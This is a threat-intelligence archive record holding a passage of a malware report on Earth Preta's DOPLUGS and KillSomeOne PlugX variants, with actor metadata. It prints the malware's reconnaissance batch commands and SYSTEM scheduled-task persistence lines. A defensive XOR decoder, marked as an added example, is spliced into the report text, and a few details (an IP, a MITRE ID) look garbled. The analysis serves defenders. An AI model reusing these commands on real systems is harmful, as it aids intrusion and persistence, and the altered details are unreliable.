\u003e\u003e\"%~dp0AE353BBEB1C6603E_E.dat\"\r\n%comspec% /q /c arp -a \u003e\u003e\"%~dp0AE353BBEB1C6603E_E.dat\"\r\n%comspec% /q /c tasklist /v \u003e\u003e\"%~dp0AE353BBEB1C6603E_E.dat\"\r\ndel %0\r\nThe output data is then encrypted and dropped to {USB_volume}:\\Usb Drive\\1.0\\{value of SOFTWARE\\CLASSES\\ms-pu\\CLSID}.dat.\r\nThread 3: Executing staged batch scripts (Execution)\r\nThis thread creates the mutex USB_NOTIFY_BAT_H3_{USB_volume} as a marker and runs only under these conditions:\r\nWhen the connection to https://www.microsoft.com fails\r\nWhen there is no value in System\\CurrentControlSet\\Control\\Network\\Version (this registry value is set when the command-line argument is “-net”)\r\nThe thread searches for batch scripts in the following folders:\r\n{USB_volume}:\\Usb Drive\\1.0\\p\\\r\n{USB_volume}:\\Kaspersky\\Usb Drive\\1.0\\p\\\r\n{USB_volume}:\\.System\\Device\\USB\\3.0\\Usb Drive\\1.0\\p\\\r\nIf the batch script name does not contain the strings tmpc_ or tmp_, the script is decrypted via the same XOR algorithm as the file encryption in the thread 2 subsection. A new batch file is then created as %temp%\\{value of QueryPerformanceCounter}.bat and executed by ShellExecuteW with the following contents:\r\n{USB_volume}\r\ncd \"{USB_volume}:\\target folder\\\"\r\n{decrypted contents in batch file}\r\ndel %0\r\nDOPLUGS backdoor behavior (Command and Control)\r\nThis behavior is the same as in the original DOPLUGS malware and is responsible for C\u0026C communication, backdoor commands, and downloading the next-stage general type of PlugX malware.\r\nThe following command lines are executed to set up scheduled tasks that keep the Wi-Fi connection enabled:\r\ncmd.exe /c schtasks.exe /create /sc minute /mo 30 /tn \"Security WIFI Script\" /tr \"netsh interface set interface \"\"\"Wireless Network Connection\"\"\" enabled\" /ru SYSTEM /F\u0026schtasks.exe /run /tn \"Security WIFI Script\"\r\ncmd.exe /c schtasks.exe /create /sc minute /mo 30 /tn \"Security WIFI2 Script\" /tr \"netsh interface set interface \"\"\"Wireless Network Connection 2\"\"\" enabled\" /ru SYSTEM /F\u0026schtasks.exe /run /tn \"Security WI2 Script\"\r\ncmd.exe /c schtasks.exe /create /sc minute /mo 30 /tn \"Security WIFI3 Script\" /tr \"netsh interface set interface \"\"\"Wireless Network Connection 3\"\"\" enabled\" /ru SYSTEM /F\u0026schtasks.exe /run /tn \"Security WIFI3 Script\"\r\nOld variant\r\nIn addition to DOPLUGS, we hunted down several customized PlugX malware samples that are also equipped with the KillSomeOne module. Based on our investigation, this integration has been active for at least three years, with the report published by Avira being the first to reveal this technique.
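As an added example (not code from the original report), the following Python recovers the artifacts that the KillSomeOne threads described above leave on a drive: stolen documents and the staged batch scripts, which use the rolling XOR (key 0x6D advancing by 0xAA per byte), and the InstanceFinderDlg.dat payload, which uses the single-byte XOR key 0x73. Two assumptions are made and marked in the code: the rolling key is a byte value and wraps modulo 256, and the base64-encoded original name is used as the staged file's name. The ciphertexts below are constructed by encrypting known plaintexts, so the round trip can be checked; none of them is real sample data.

```python
import base64

# Added example: decoders for the two XOR schemes used by the KillSomeOne module.

def xor_rolling(data, key=0x6D, step=0xAA):
    '''Rolling XOR for stolen documents and staged batch scripts.
    Each byte is XORed with the current key, which then advances by step.
    Assumption: the key is a byte register, so it wraps modulo 256.
    XOR is symmetric, so the same call encrypts and decrypts.'''
    out = bytearray()
    k = key
    for b in data:
        out.append(b ^ k)
        k = (k + step) & 0xFF
    return bytes(out)

def xor_single(data, key=0x73):
    '''Single-byte XOR that InstanceFinderDlgUI.dll applies to InstanceFinderDlg.dat.'''
    return bytes(b ^ key for b in data)

# Leading bytes of the file types the stealer looks for, plus PE for the payload.
MAGIC = {
    b'%PDF': 'pdf',
    b'PK': 'office-openxml (docx/xlsx/pptx)',
    bytes([0xD0, 0xCF, 0x11, 0xE0]): 'office-binary (doc/xls/ppt)',
    b'MZ': 'pe',
}

def identify(plain):
    '''Map a decrypted blob to a file type by its leading bytes, or unknown.'''
    for magic, label in MAGIC.items():
        if plain.startswith(magic):
            return label
    return 'unknown'

def recover_stolen(staged):
    '''staged: {staged_file_name: encrypted_bytes} from the collection folder.
    Assumption: the staged name is the base64 of the original file name.
    Returns {original_name: (file_type, plaintext)}; names that are not valid
    base64 are kept as-is so nothing is silently dropped.'''
    recovered = {}
    for b64name, blob in staged.items():
        try:
            name = base64.b64decode(b64name, validate=True).decode('utf-8')
        except (ValueError, UnicodeDecodeError):
            name = b64name
        plain = xor_rolling(blob)
        recovered[name] = (identify(plain), plain)
    return recovered

def recover_batch(blob):
    '''Decrypt one staged batch script from a p subfolder (the worm skips names
    containing tmp_ or tmpc_) and return its text.'''
    return xor_rolling(blob).decode('utf-8', errors='replace')

# Constructed fixtures: known plaintexts encrypted with the schemes above.
SAMPLE_STAGED = {
    base64.b64encode('budget 2024.xlsx'.encode()).decode(): xor_rolling(b'PK' + bytes(30)),
    base64.b64encode('memo.pdf'.encode()).decode(): xor_rolling(b'%PDF-1.7 constructed body'),
}
SAMPLE_BATCH = xor_rolling(b'ipconfig /all > out.txt')
SAMPLE_PAYLOAD = xor_single(b'MZ' + bytes(62))

if __name__ == '__main__':
    for name, (kind, plain) in recover_stolen(SAMPLE_STAGED).items():
        print(name, kind, len(plain))
    print(recover_batch(SAMPLE_BATCH))
    print(identify(xor_single(SAMPLE_PAYLOAD)))
```

Because both schemes are plain XOR, a single known plaintext byte at a known offset is enough to confirm the key and step on a real sample before bulk decryption; the magic-byte check in identify() gives that confirmation for free on documents.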
The sample mentioned in Avira’s report is the first PlugX variant\r\nwith the KillSomeOne module designed for spreading via USB.\r\nThe following table is a list of different PlugX malware types with integrate KillSomeOne variants:\r\nActive since\r\n(approximation)\r\nSample hash (SHA256) Variant C\u0026C server\r\nNovember 2023  3fa7eaa4697cfcf71d0bd5aa9d2dbec495d7eac43bdfcfbef07a306635e4973b\r\nKillSomeOne\r\n+ DOPLUGS\r\n45[.]83[.]236[.]10\r\nDecember 2022\r\nto May 2023\r\n17225c9e46f809556616d9e09d29fd7c13ca90d25ae21e00cc9ad7857ee66b82 KillSomeOne\r\n+\r\n(Transitioning\r\nbetween\r\n45[.]131[.]179[.]1\r\n45[.]131[.]179[.]1\r\n45[.]131[.]179[.]1\r\n103[.]192[.]226[.\r\nhttps://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html\r\nPage 22 of 24\n\nHodur and\r\nDOPLUGS)\r\n3127.0.0.1:80\r\n \r\nSeptember 2021\r\nto December\r\n2022\r\nd0ca6917c042e417da5996efa49afca6cb15f09e3b0b41cbc94aab65a409e9dc\r\nKillSomeOne\r\n+ Hodur\r\nFirst  category\r\n154[.]204.27.181\r\n154[.]204.27.181\r\n103[.]56.53.120:8\r\n103[.]56.53.120:8\r\nSecond category\r\n176[.]113.69.91:4\r\nSeptember 2018 d64afd9799d8de3f39a4ce99584fa67a615a667945532cfa3f702adbe27724c4\r\nKillSomeOne\r\n+ first variant\r\nof the PlugX\r\nmalware\r\n45[.]251[.]240[.]5\r\n45[.]251[.]240[.]5\r\nTable 13. Different stages of evolution for KillSomeOne + PlugX\r\nUpon checking backdoor commands of these PlugX malware types, we found an additional variant that serves as the\r\ntransition from DOPLUGS to Hodur. This version keeps the disk module of the general type of the PlugX malware, although\r\nhere the customized backdoor command is modified to the improved DOPLUGS type (unlike the original DOPLUGS\r\nvariant without any module from the general type of the PlugX malware). 
Another impressive feature is that the\r\nKillSomeOne + Hodur variant has two categories of C\u0026C servers for communication: the first one as a regular C\u0026C server\r\nto receive backdoor commands, while the second one is designed to download payloads for process injection in svchost.exe.\r\nConclusion\r\nEarth Preta has primarily focused on targeting government entities worldwide, particularly within the Asia-Pacific region\r\nand Europe. Based on our observations, we believe Earth Preta tends to use spear-phishing emails and Google Drive links in\r\nits attacks.\r\nWe explained the purpose of the DOPLUGS malware (which we believe has been in use since 2022), one of the primary\r\ntools Earth Preta uses to download the general type of the PlugX malware. While hunting for other samples, we discovered a\r\nDOPLUGS variant that has KillSomeOne module integration and that can be traced back to 2018. This shows that Earth\r\nPreta has been refining its tools for some time now, constantly adding new functionalities and features.  \r\nOver the course of our investigations into Earth Preta’s activities, we have observed that the group remains highly active,\r\nparticularly in Europe and Asia. 
It is likely that we will hear more from this group in the future, so it is a good idea for\r\nsecurity teams to familiarize themselves with how Earth Preta operates.\r\nMITRE ATT\u0026CK\r\nTactic | ID | Name\r\nResource Development | T1583.004 | Acquire Infrastructure: Server\r\nResource Development | T1587.001 | Develop Capabilities: Malware\r\nResource Development | T1585.002 | Establish Accounts: Email Accounts\r\nResource Development | T1588.002 | Obtain Capabilities: Tool\r\nResource Development | T1608.001 | Stage Capabilities: Upload Malware\r\nResource Development | T1608.005 | Link Target\r\nInitial Access | T1566.002 | Phishing: Spearphishing Link\r\nInitial Access | T1090 | Replication Through Removable Media\r\nExecution | T1204.002 | User Execution: Malicious File\r\nPersistence | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder\r\nPersistence | T1574.002 | Hijack Execution Flow: DLL Side-Loading\r\nPersistence | T1053.005 | Scheduled Task/Job: Scheduled Task\r\nDefense Evasion | T1140 | Deobfuscate/Decode Files or Information\r\nDefense Evasion | T1036.005 | Masquerading: Match Legitimate Name or Location\r\nDefense Evasion | T1070.009 | Indicator Removal: Clear Persistence\r\nDefense Evasion | T1564.001 | Hidden Files and Directories\r\nCredential Access | T1056.001 | Input Capture: Keylogging\r\nDiscovery | T1083 | File and Directory Discovery\r\nDiscovery | T1016.001 | Internet Connection Discovery\r\nDiscovery | T1049 | System Network Connections Discovery\r\nDiscovery | T1082 | System Information Discovery\r\nDiscovery | T1012 | Query Registry\r\nLateral Movement | T1091 | Replication Through Removable Media\r\nCollection | T1005 | Data from Local System\r\nCollection | T1025 | Data from Removable Media\r\nCommand and Control | T1071.001 | Application Layer Protocol: Web Protocols\r\nCommand and Control | T1573 | Encrypted Channel\r\nIndicators of Compromise\r\nThe indicators of compromise for this entry can be found here.\r\nSource: https://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html"
	],
	"report_names": [
		"earth-preta-campaign-targets-asia-doplugs.html"
	],
	"threat_actors": [
		{
			"id": "2ff375ef-7859-4d44-9399-06c9d1d9359c",
			"created_at": "2023-07-11T02:00:10.063244Z",
			"updated_at": "2026-04-10T02:00:03.367017Z",
			"deleted_at": null,
			"main_name": "SmugX",
			"aliases": [],
			"source_name": "MISPGALAXY:SmugX",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "aa90ad17-8852-4732-9dba-72ffb64db493",
			"created_at": "2023-07-11T02:00:10.067957Z",
			"updated_at": "2026-04-10T02:00:03.367801Z",
			"deleted_at": null,
			"main_name": "RedDelta",
			"aliases": [],
			"source_name": "MISPGALAXY:RedDelta",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b69037ec-2605-4de4-bb32-a20d780a8406",
			"created_at": "2023-01-06T13:46:38.790766Z",
			"updated_at": "2026-04-10T02:00:03.101635Z",
			"deleted_at": null,
			"main_name": "MUSTANG PANDA",
			"aliases": [
				"Stately Taurus",
				"LuminousMoth",
				"TANTALUM",
				"Twill Typhoon",
				"TEMP.HEX",
				"Earth Preta",
				"Polaris",
				"BRONZE PRESIDENT",
				"HoneyMyte",
				"Red Lich",
				"TA416"
			],
			"source_name": "MISPGALAXY:MUSTANG PANDA",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6daadf00-952c-408a-89be-aa490d891743",
			"created_at": "2025-08-07T02:03:24.654882Z",
			"updated_at": "2026-04-10T02:00:03.645565Z",
			"deleted_at": null,
			"main_name": "BRONZE PRESIDENT",
			"aliases": [
				"Earth Preta ",
				"HoneyMyte ",
				"Mustang Panda ",
				"Red Delta ",
				"Red Lich ",
				"Stately Taurus ",
				"TA416 ",
				"Temp.Hex ",
				"Twill Typhoon "
			],
			"source_name": "Secureworks:BRONZE PRESIDENT",
			"tools": [
				"BlueShell",
				"China Chopper",
				"Claimloader",
				"Cobalt Strike",
				"HIUPAN",
				"ORat",
				"PTSOCKET",
				"PUBLOAD",
				"PlugX",
				"RCSession",
				"TONESHELL",
				"TinyNote"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b5449533-0ff1-4048-999d-7d4bfd8e6da6",
			"created_at": "2022-10-25T16:07:24.114365Z",
			"updated_at": "2026-04-10T02:00:04.869887Z",
			"deleted_at": null,
			"main_name": "RedDelta",
			"aliases": [
				"Operation Dianxun",
				"TA416"
			],
			"source_name": "ETDA:RedDelta",
			"tools": [
				"Agent.dhwf",
				"Agentemis",
				"Chymine",
				"Cobalt Strike",
				"CobaltStrike",
				"Darkmoon",
				"Destroy RAT",
				"DestroyRAT",
				"Gen:Trojan.Heur.PT",
				"Kaba",
				"Korplug",
				"PlugX",
				"Poison Ivy",
				"RedDelta",
				"SPIVY",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Xamtrav",
				"cobeacon",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "9baa7519-772a-4862-b412-6f0463691b89",
			"created_at": "2022-10-25T15:50:23.354429Z",
			"updated_at": "2026-04-10T02:00:05.310361Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Mustang Panda",
				"TA416",
				"RedDelta",
				"BRONZE PRESIDENT",
				"STATELY TAURUS",
				"FIREANT",
				"CAMARO DRAGON",
				"EARTH PRETA",
				"HIVE0154",
				"TWILL TYPHOON",
				"TANTALUM",
				"LUMINOUS MOTH",
				"UNC6384",
				"TEMP.Hex",
				"Red Lich"
			],
			"source_name": "MITRE:Mustang Panda",
			"tools": [
				"CANONSTAGER",
				"STATICPLUGIN",
				"ShadowPad",
				"TONESHELL",
				"Cobalt Strike",
				"HIUPAN",
				"Impacket",
				"SplatCloak",
				"PAKLOG",
				"Wevtutil",
				"AdFind",
				"CLAIMLOADER",
				"Mimikatz",
				"PUBLOAD",
				"StarProxy",
				"CorKLOG",
				"RCSession",
				"NBTscan",
				"PoisonIvy",
				"SplatDropper",
				"China Chopper",
				"PlugX"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ee03999-5432-4a65-a850-c543b4fefc3d",
			"created_at": "2022-10-25T16:07:23.882813Z",
			"updated_at": "2026-04-10T02:00:04.776949Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Bronze President",
				"Camaro Dragon",
				"Earth Preta",
				"G0129",
				"Hive0154",
				"HoneyMyte",
				"Mustang Panda",
				"Operation SMUGX",
				"Operation SmugX",
				"PKPLUG",
				"Red Lich",
				"Stately Taurus",
				"TEMP.Hex",
				"Twill Typhoon"
			],
			"source_name": "ETDA:Mustang Panda",
			"tools": [
				"9002 RAT",
				"AdFind",
				"Agent.dhwf",
				"Agentemis",
				"CHINACHOPPER",
				"China Chopper",
				"Chymine",
				"ClaimLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"DCSync",
				"DOPLUGS",
				"Darkmoon",
				"Destroy RAT",
				"DestroyRAT",
				"Farseer",
				"Gen:Trojan.Heur.PT",
				"HOMEUNIX",
				"Hdump",
				"HenBox",
				"HidraQ",
				"Hodur",
				"Homux",
				"HopperTick",
				"Hydraq",
				"Impacket",
				"Kaba",
				"Korplug",
				"LadonGo",
				"MQsTTang",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"NBTscan",
				"NetSess",
				"Netview",
				"Orat",
				"POISONPLUG.SHADOW",
				"PUBLOAD",
				"PVE Find AD Users",
				"PlugX",
				"Poison Ivy",
				"PowerView",
				"QMAGENT",
				"RCSession",
				"RedDelta",
				"Roarur",
				"SPIVY",
				"ShadowPad Winnti",
				"SinoChopper",
				"Sogu",
				"TIGERPLUG",
				"TONEINS",
				"TONESHELL",
				"TVT",
				"TeamViewer",
				"Thoper",
				"TinyNote",
				"WispRider",
				"WmiExec",
				"XShellGhost",
				"Xamtrav",
				"Zupdax",
				"cobeacon",
				"nbtscan",
				"nmap",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434643,
	"ts_updated_at": 1775792193,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e4fd3b05fff6cc3c9f1f1499137b71dd531d7237.pdf",
		"text": "https://archive.orkl.eu/e4fd3b05fff6cc3c9f1f1499137b71dd531d7237.txt",
		"img": "https://archive.orkl.eu/e4fd3b05fff6cc3c9f1f1499137b71dd531d7237.jpg"
	}
}